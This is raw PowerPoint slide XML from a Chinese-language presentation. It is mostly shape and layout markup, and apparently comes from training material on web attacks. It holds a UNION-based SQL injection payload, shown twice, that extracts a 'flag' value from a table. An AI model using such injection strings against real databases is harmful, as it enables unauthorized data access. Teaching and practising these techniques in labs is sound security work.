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1640" r:id="rId3"/>
    <p:sldId id="1334" r:id="rId5"/>
    <p:sldId id="1629" r:id="rId6"/>
    <p:sldId id="1341" r:id="rId7"/>
    <p:sldId id="1413" r:id="rId8"/>
    <p:sldId id="1604" r:id="rId9"/>
    <p:sldId id="1605" r:id="rId10"/>
    <p:sldId id="1606" r:id="rId11"/>
    <p:sldId id="1607" r:id="rId12"/>
    <p:sldId id="1625" r:id="rId13"/>
    <p:sldId id="1612" r:id="rId14"/>
    <p:sldId id="1624" r:id="rId15"/>
  </p:sldIdLst>
  <p:sldSz cx="1219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yz" initials="x" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="秦 莫天" initials="秦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FEF"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="003366"/>
    <a:srgbClr val="3399FF"/>
    <a:srgbClr val="008000"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="6666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7" autoAdjust="0"/>
    <p:restoredTop sz="86026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="974" y="58"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2201"/>
        <p:guide pos="3752"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="321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314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6885" y="720725"/>
            <a:ext cx="640143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159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9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7A1ED033-5F5C-4572-AE4B-7CFF71C657D2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and 1=2 union select 1,(select flag from error_flag limit 0,1),3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87D939-5749-4C63-8AED-0305FE88E523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1ED033-5F5C-4572-AE4B-7CFF71C657D2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and 1=2 union select 1,(select flag from error_flag limit 0,1),3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PhAnim="0" showMasterSp="0">
  <p:cSld name="标题幻灯片">
    <p:bg bwMode="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图片 112" descr="掌控者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83835" y="1240790"/>
            <a:ext cx="1740535" cy="621665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12193201" cy="30686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5" name="AutoShape 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3759570" y="3113088"/>
            <a:ext cx="7823970" cy="83820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6" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10262610" y="1741488"/>
            <a:ext cx="711270" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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7" name="Rectangle 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9246510" y="1131888"/>
            <a:ext cx="1219320" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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8" name="Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10770660" y="141288"/>
            <a:ext cx="1219320" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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9" name="Rectangle 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="750888"/>
            <a:ext cx="711270" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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10" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8433630" y="2884488"/>
            <a:ext cx="711270" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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11" name="Rectangle 114"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5080500" y="2655888"/>
            <a:ext cx="203220" cy="152400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12" name="Rectangle 120"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5690160" y="2655888"/>
            <a:ext cx="203220" cy="152400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13" name="Rectangle 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5994990" y="2655888"/>
            <a:ext cx="203220" cy="152400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14" name="Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6299820" y="2655888"/>
            <a:ext cx="203220" cy="152400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ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 211"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299820" y="1741488"/>
            <a:ext cx="1727370" cy="838200"/>
            <a:chOff x="2976" y="1440"/>
            <a:chExt cx="816" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1440"/>
              <a:ext cx="96" cy="96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17" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1728"/>
              <a:ext cx="96" cy="96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18" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1584"/>
              <a:ext cx="96" cy="96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19" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1728"/>
              <a:ext cx="96" cy="96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20" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1872"/>
              <a:ext cx="96" cy="96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21" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1584"/>
              <a:ext cx="96" cy="96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22" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1872"/>
              <a:ext cx="96" cy="96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23" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1440"/>
              <a:ext cx="96" cy="96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24" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1584"/>
              <a:ext cx="96" cy="96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25" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1728"/>
              <a:ext cx="96" cy="96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26" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1872"/>
              <a:ext cx="96" cy="96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27" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1440"/>
              <a:ext cx="96" cy="96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28" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1728"/>
              <a:ext cx="96" cy="96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29" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1584"/>
              <a:ext cx="96" cy="96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30" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1728"/>
              <a:ext cx="96" cy="96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31" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1872"/>
              <a:ext cx="96" cy="96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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4470840" y="1970088"/>
            <a:ext cx="1727370" cy="609600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="816" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1584"/>
              <a:ext cx="96" cy="96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34" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1872"/>
              <a:ext cx="96" cy="96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35" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1584"/>
              <a:ext cx="96" cy="96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36" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1728"/>
              <a:ext cx="96" cy="96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37" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1872"/>
              <a:ext cx="96" cy="96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38" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1584"/>
              <a:ext cx="96" cy="96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39" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1872"/>
              <a:ext cx="96" cy="96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40" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1584"/>
              <a:ext cx="96" cy="96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41" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1728"/>
              <a:ext cx="96" cy="96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42" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1872"/>
              <a:ext cx="96" cy="96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43" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="1872"/>
              <a:ext cx="96" cy="96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44" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="1872"/>
              <a:ext cx="96" cy="96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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016100" y="3570288"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776"/>
              <a:ext cx="95" cy="95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47" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2065"/>
              <a:ext cx="95" cy="95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48" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95" cy="97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49" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1776"/>
              <a:ext cx="95" cy="95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50" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920"/>
              <a:ext cx="95" cy="95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51" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="2065"/>
              <a:ext cx="95" cy="95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52" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776"/>
              <a:ext cx="97" cy="95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53" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2065"/>
              <a:ext cx="97" cy="95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54" name="Rectangle 152"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2207"/>
              <a:ext cx="97" cy="97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55" name="Rectangle 153"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776"/>
              <a:ext cx="98" cy="95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56" name="Rectangle 154"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920"/>
              <a:ext cx="98" cy="95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57" name="Rectangle 155"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065"/>
              <a:ext cx="98" cy="95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58" name="Rectangle 156"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98" cy="97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59" name="Rectangle 157"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920"/>
              <a:ext cx="97" cy="95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60" name="Rectangle 158"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2207"/>
              <a:ext cx="97" cy="97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61" name="Rectangle 159"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776"/>
              <a:ext cx="97" cy="95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62" name="Rectangle 160"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920"/>
              <a:ext cx="97" cy="95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63" name="Rectangle 161"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2065"/>
              <a:ext cx="97" cy="95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64" name="Rectangle 162"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776"/>
              <a:ext cx="95" cy="95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65" name="Rectangle 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2065"/>
              <a:ext cx="95" cy="95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66" name="Rectangle 164"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632"/>
              <a:ext cx="95" cy="97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67" name="Rectangle 165"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776"/>
              <a:ext cx="95" cy="95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68" name="Rectangle 166"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920"/>
              <a:ext cx="95" cy="95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69" name="Rectangle 167"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2065"/>
              <a:ext cx="95" cy="95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70" name="Rectangle 168"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1632"/>
              <a:ext cx="95" cy="97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71" name="Rectangle 169"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1920"/>
              <a:ext cx="95" cy="95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72" name="Rectangle 170"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1776"/>
              <a:ext cx="97" cy="95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73" name="Rectangle 171"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1920"/>
              <a:ext cx="97" cy="95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74" name="Rectangle 172"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="2065"/>
              <a:ext cx="97" cy="95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75" name="Rectangle 173"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2065"/>
              <a:ext cx="95" cy="95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76" name="Rectangle 174"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2065"/>
              <a:ext cx="97" cy="95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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315920" y="827088"/>
            <a:ext cx="3556350" cy="1066800"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rectangle 176"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776"/>
              <a:ext cx="96" cy="96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79" name="Rectangle 177"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2064"/>
              <a:ext cx="96" cy="96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80" name="Rectangle 178"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2208"/>
              <a:ext cx="96" cy="96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81" name="Rectangle 179"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1776"/>
              <a:ext cx="96" cy="96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82" name="Rectangle 180"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1920"/>
              <a:ext cx="96" cy="96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83" name="Rectangle 181"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="2064"/>
              <a:ext cx="96" cy="96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84" name="Rectangle 182"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1776"/>
              <a:ext cx="96" cy="96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85" name="Rectangle 183"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="2064"/>
              <a:ext cx="96" cy="96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86" name="Rectangle 184"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="2208"/>
              <a:ext cx="96" cy="96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87" name="Rectangle 185"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
